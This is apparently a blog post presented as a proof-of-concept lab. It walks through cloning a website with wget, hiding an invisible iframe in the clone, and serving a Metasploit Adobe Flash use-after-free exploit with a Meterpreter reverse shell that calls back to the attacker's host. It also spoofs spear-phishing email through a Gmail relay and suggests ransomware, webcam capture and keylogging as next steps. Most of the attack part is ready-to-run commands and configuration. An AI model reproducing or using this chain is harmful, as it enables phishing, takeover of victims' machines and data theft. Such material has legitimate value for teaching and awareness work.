The post contains a crude example on how to easily clone an existing site for use in a phishing campaign. It is based on rudimentary techniques as it is only meant as a proof-of-concept demonstration lab. It is as such not really a tutorial for conducting professional phishing. For sake of simplicity it is based of a Kali 2017.2 distribution, but any Linux will suffice just as well.

There are of course lots of different choices when it comes to phishing such as target audience, content, payloads etc. as mentioned before, this is merely to give a few pointers on how-to go about creating a minimal example.

Cloning a site with Kali

The Apache webserver and an abundance of other tools already comes shipped with Kali. So use the nails available in your toolbox.

A simple choice for cloning a page is wget (dating back to 1996). It is simple and gets the job done! The -p attribute makes sure also to download required files such as stylesheets and .js etc.

wget -p www.example.com

After the cloning is complete (insert prefered sci-fi reference here) the files are moved to the Apache web files directory.

mv www.example.com/* /var/www/html/

Lastly fire up the apache webserver itself.

service apache2 start

You can test if it is working by simple browsing to http://localhost from the Kali GUI (if you have that running).

Spicing it up a little

Now your clone site is sitting on your local box you will want to mangle a little with it by creating a hook at a given port. This can be done by creating an zero width, zero height iframe in which you can load whatever content you desire (in this example we will hook it up to metasploit). Just open an editor and edit the main starting page.

nano /var/www/html/index.html

and insert the ‘iframe part’ herein

<!DOCTYPE html>
<html>
<head><iframe src="http://kali-IP_or_somename:8080/" width="0" height="0" scrolling="no"></iframe>
<title>
...

The iframe in question will be ‘invisible’ to the user, but gives you the possibility to load ‘something extra’ on-the-fly. You will want to use real DNS names for all purposes if going out of your local sandbox.

Adding a malicious payload

In this example I will go with a full takeover of the machine using a relatively known Metasploit exploit module, utilizing a Use-After-Free in Adobe Flash.

Use msfconsole and the following parameters (or copy them to a .rc file)

use exploit/multi/browser/adobe_flash_hacking_team_uaf
set SRVHOST kali-IP_or_somename
set SRVPORT 8080
set URIPATH /
set payload windows/meterpreter/reverse_tcp
set LHOST kali-IP_or_somename
set LPORT 666
exploit

This pretty basically sets up a malicious .swf flash file in the root of port 8080 on your machine (which we referenced earlier in the iframe) and stages a Meterpreter payload and listener.

Finding a vulnerable target

The exploit used here are somewhat old and since we are only using this for demonstration purposes, we can ‘cheat’ a little. If you install a windows 8.1 from scratch (or anything with an older flash version) it will be vulnerable for this particular exploit and can as such be used for further demonstrative purposes.

If you browse towards your cloned site, you should get a Meterpreter shell (ie. control over their machine) at your Kali installation and can then move on to whatever demonstration you had in mind (Persistence? upload a cryptolocker? take a photo with a webcam? steal data or keylogger?).

The point is that this particular exploit may be old, but new ones are coming out all the time, and these are often a cornerstone in Exploit Kits and thus a very real threat to the users.

Baiting the target

The easiest way is by spear-phishing email. The security mechanisms in email are pretty bad and if you only spoof a limited amount of mails and have custom content, you are likely to go under the radar. Be aware that if you spoof domains with SPF records (properly) in place your fraudulent mail may be caught by the anti-spam solution of the recipient.

Spoofing using gmail as a relay (again you can use most freely available SMTP services) can be achieved simple as this.

$ cat mailbody.txt | sendemail -l email.log 
 -f "sender@domain.com" 
 -u "Email Subject 2" 
 -t "receiver@domain.com" 
 -cc "receiver2@domain.com" 
 -bcc "receiver3@domain.com" 
 -s "smtp.gmail.com:587" 
 -o tls=yes 
 -xu "youremail@gmail.com" 
 -xp "Email Password"

In the mailbody.txt you can write a small html page with a reference to your phishing site and whatever content you have placed there.

Alternative method

Another wrench in the Kali toolbox is the SEToolkit (Social Engineer Toolkit) which can do much of the same as above (and more). However it does make it somewhat harder to actually grasp what is going on in the background and can be a little annoying to work with when you have to reproduce the same more than one time.